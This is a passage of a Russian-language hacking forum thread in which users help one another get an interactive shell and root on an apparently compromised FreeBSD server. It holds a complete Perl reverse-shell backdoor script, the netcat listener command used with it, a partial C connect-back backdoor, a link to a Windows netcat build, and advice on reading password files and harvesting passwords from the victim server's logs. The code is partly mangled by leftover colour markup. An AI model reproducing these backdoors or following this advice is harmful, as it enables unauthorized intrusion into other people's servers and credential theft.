HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 29.01.2012, 03:07
Live777
Новичок
Регистрация: 23.05.2011
Сообщений: 28
Провел на форуме:
5712

Репутация: 0
По умолчанию

А рутать вообще из под винды можно ? Просто сколько смотрю все только на линуксе работают что ли ?
 

  #52  
Старый 29.01.2012, 09:21
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Цитата:
Сообщение от Live777  
А рутать вообще из под винды можно ? Просто сколько смотрю все только на линуксе работают что ли ?
Кидай в папку system32 содержимое архива:

http://joncraton.org/files/nc111nt.zip

Потом Win+R, а дальше по инструкции...
 

  #53  
Старый 13.03.2012, 21:09
Mr.Snuffer
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
Провел на форуме:
36102

Репутация: 0
По умолчанию

Тут есть ещё кто живой?

Короче такая штука.

поднимаю у себя на серве листенер 31336 порта.

netcat -l -p 31336

В шелле соответственно выполняю

print system('perl dc.pl мойип 31336');

пишет

Цитата:
Сообщение от None  
Data Cha0s Connect Back Backdoor
[ * ] Dumping Arguments
[ * ] Connecting...
[ * ] Connecting...
но на серваке 0 реакции.

код dc.pl

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/usr/bin/perl

[/COLOR][COLOR="#007700"]use[/COLOR][COLOR="#0000BB"]Socket[/COLOR][COLOR="#007700"];

print[/
COLOR][COLOR="#DD0000"]"Data Cha0s Connect Back Backdoor\n\n"[/COLOR][COLOR="#007700"];

if (![/COLOR][COLOR="#0000BB"]$ARGV[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]) {

[/
COLOR][COLOR="#0000BB"]printf[/COLOR][COLOR="#DD0000"]"Usage: $0 [Host] \n"[/COLOR][COLOR="#007700"];

exit([/
COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);

}

print[/
COLOR][COLOR="#DD0000"]"[*] Dumping Arguments\n"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$ARGV[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]$ARGV[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]) {

[/
COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$ARGV[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];

}

print[/
COLOR][COLOR="#DD0000"]"[*] Connecting...\n"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$proto[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getprotobyname[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'tcp'[/COLOR][COLOR="#007700"]) || die([/COLOR][COLOR="#DD0000"]"Unknown Protocol\n"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]socket[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]SERVER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PF_INET[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]SOCK_STREAM[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$proto[/COLOR][COLOR="#007700"]) || die ([/COLOR][COLOR="#DD0000"]"Socket Error\n"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]my $target[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]inet_aton[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]);

if (![/COLOR][COLOR="#0000BB"]connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]SERVER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pack[/COLOR][COLOR="#DD0000"]"SnA4x8"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$target[/COLOR][COLOR="#007700"])) {

die([/
COLOR][COLOR="#DD0000"]"Unable to Connect\n"[/COLOR][COLOR="#007700"]);

}

print[/
COLOR][COLOR="#DD0000"]"[*] Spawning Shell\n"[/COLOR][COLOR="#007700"];

if (![/COLOR][COLOR="#0000BB"]fork[/COLOR][COLOR="#007700"]( )) {

[/
COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STDIN[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]">&SERVER"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STDOUT[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]">&SERVER"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STDERR[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]">&SERVER"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#DD0000"]'/bin/sh'[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]'-bash'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\0"[/COLOR][COLOR="#0000BB"]x 4[/COLOR][COLOR="#007700"];

exit([/
COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

}

print[/
COLOR][COLOR="#DD0000"]"[*] Datached\n\n"[/COLOR][COLOR="#007700"];

[/
COLOR][/COLOR
Что может быть не так?

Цитата:
Сообщение от None  
FreeBSD XXX.XX 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011 root@mason.cse.buffalo.edu:/usr/ob
 

  #54  
Старый 13.03.2012, 22:28
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

Цитата:
Сообщение от Mr.Snuffer  
Тут есть ещё кто живой?
Короче такая штука.
поднимаю у себя на серве листенер 31336 порта.
netcat -l -p 31336
В шелле соответственно выполняю
print system('perl dc.pl мойип 31336');
пишет
но на серваке 0 реакции.
Что может быть не так?
Для того чтобы сделать бекконект нужно чтобы у тебя был прямой ип адрес, исходя из твоего описания ситуации можно предположить, что у тебя не прямой ип, или фарейвол блокирует коннект.

Решение данной проблемы:

1) Купить дедик с прямым ип адресом и на него делать бекконетк.

2) Биндити порт на серваке и коннектитись через неткат к нему (опять может возникнуть проблема с фаерволом но уже на стороне сервера\шелла)

Цитата:
Сообщение от None  
FreeBSD XXX.XX 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011 root@mason.cse.buffalo.edu:/usr/ob
п.с:ты не порутаеш данный серв
 

  #55  
Старый 13.03.2012, 22:42
Mr.Snuffer
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
Провел на форуме:
36102

Репутация: 0
По умолчанию

Цитата:
Сообщение от Cybersteger  
Для того чтобы сделать бекконект нужно чтобы у тебя был прямой ип адрес, исходя из твоего описания ситуации можно предположить, что у тебя не прямой ип, или фарейвол блокирует коннект.
Решение данной проблемы:
1) Купить дедик с прямым ип адресом и на него делать бекконетк.
2) Биндити порт на серваке и коннектитись через неткат к нему (опять может возникнуть проблема с фаерволом но уже на стороне сервера\шелла)
п.с:ты не порутаеш данный серв
Ип прямой. Фаер возможно.

А то что нет сплоитов - это пичально
 

  #56  
Старый 13.03.2012, 22:46
Mr.Snuffer
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
Провел на форуме:
36102

Репутация: 0
По умолчанию

А есть способ узнать пасс от текущего юзера, от которого шелл залит?
 

  #57  
Старый 14.03.2012, 00:48
Cybersteger
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607

Репутация: 19
По умолчанию

Цитата:
Сообщение от Mr.Snuffer  
А есть способ узнать пасс от текущего юзера, от которого шелл залит?
в FreeBSD пароли храняться в /etc/master.password в зашифрованом виде в 98% случая доступен только рут юзеру

здесь стоит скорее вопрос зачем тебе интерактивный доступ, если ты не порутаеш серв, остальные действия можно выполнять и через веб-шелл
 

  #58  
Старый 14.03.2012, 00:55
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию

Цитата:
Сообщение от Mr.Snuffer  
Ип прямой. Фаер возможно.
А то что нет сплоитов - это пичально
если прямой ип и у тебя роутер возможно не настроен форвардинг портов и демилитаризированая зона на роутере.

и отключи фаер у себя, да.

попробуй еще другой бэк:

[CODE]
/*
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
* client: nc -lp 9999
* server: ./backconnect 9999
*********************************
*/

#include
#include
#include
#include
#include
#include
#include
#include

int main (int argc, char **argv) {
struct sockaddr_in sock;
int sd;
char command[256];

if (argc \n", argv[0]);
return 1;
}

close(1);

if ((sd = socket(PF_INET, SOCK_STREAM, 0))
 

  #59  
Старый 14.03.2012, 01:03
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


По умолчанию

Цитата:
Сообщение от Mr.Snuffer  
А есть способ узнать пасс от текущего юзера, от которого шелл залит?
если есть права читай логи, все что не лень. очень часто юзеры феилят и вбивают пасс вместо логина следовательно он записывается и другие случаи. пробуй пасс от разных сервисов, если есть возможность.
 

  #60  
Старый 25.03.2012, 14:02
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922

Репутация: 75


По умолчанию

блин, чёто ссылочки из первого поста поздыхали, нс залил шелл скачать нужный сплоит, а дальше чем и как пользоватся?
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новичкам в помощь оlbaneс Болталка 204 13.06.2010 19:00
Active Directory, хороший мануал. Cthulchu Windows 8 15.01.2009 16:36
Ищу мануал!!! dron68 Болталка 0 14.02.2007 10:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.